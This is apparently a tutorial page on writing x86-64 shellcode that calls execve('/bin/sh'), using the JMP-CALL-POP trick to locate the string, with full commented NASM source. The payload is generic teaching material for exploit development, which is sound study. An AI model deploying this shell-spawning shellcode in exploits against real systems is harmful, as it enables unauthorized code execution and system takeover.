Shellcode 1 -> execve(/bin/sh) JMP CALL POP
We will use JMP CALL POP technique to find the address of /bin/sh and make rdi point to it.
Add a null byte after it
RDX needs to point to a place where 8 byte of 0 is there.
RSi needs to point to the address of /bin/sh,0x0000000000000000 instruction
Shellcode becomes:
global _start
section .text
_start:
jmp find_address
shellcode:
xor rax, rax
; Get the address of the string
pop rdi
; Convert the A -> 0x0 to null terminate the string
mov [rdi +7], byte ah
; Copy the address of the string in RDI to BBBBBBBB
mov [rdi +8], rdi
; copy the NULL 0x0000000000000000 -> CCCCCCCC
mov [rdi +16], rax
; Setup the addresses
lea rsi, [rdi +8]
lea rdx, [rdi +16]
add rax, 59
syscall
find_address:
call shellcode
shell_path_string: db "/bin/shABBBBBBBBCCCCCCCC"
Note: lea might give an error. In that case, we have to ensure that our shellcode can edit the defined bytes in the text section. If that doesn't happen an alternate is to introduce a null byte with /bin/sh in the defined bytes and finding other ways to make RSI point to the address of /bin/sh followed by 8 bytes of 0s and RDX can be assigned by RAX which is already 0.
Last updated
Was this helpful?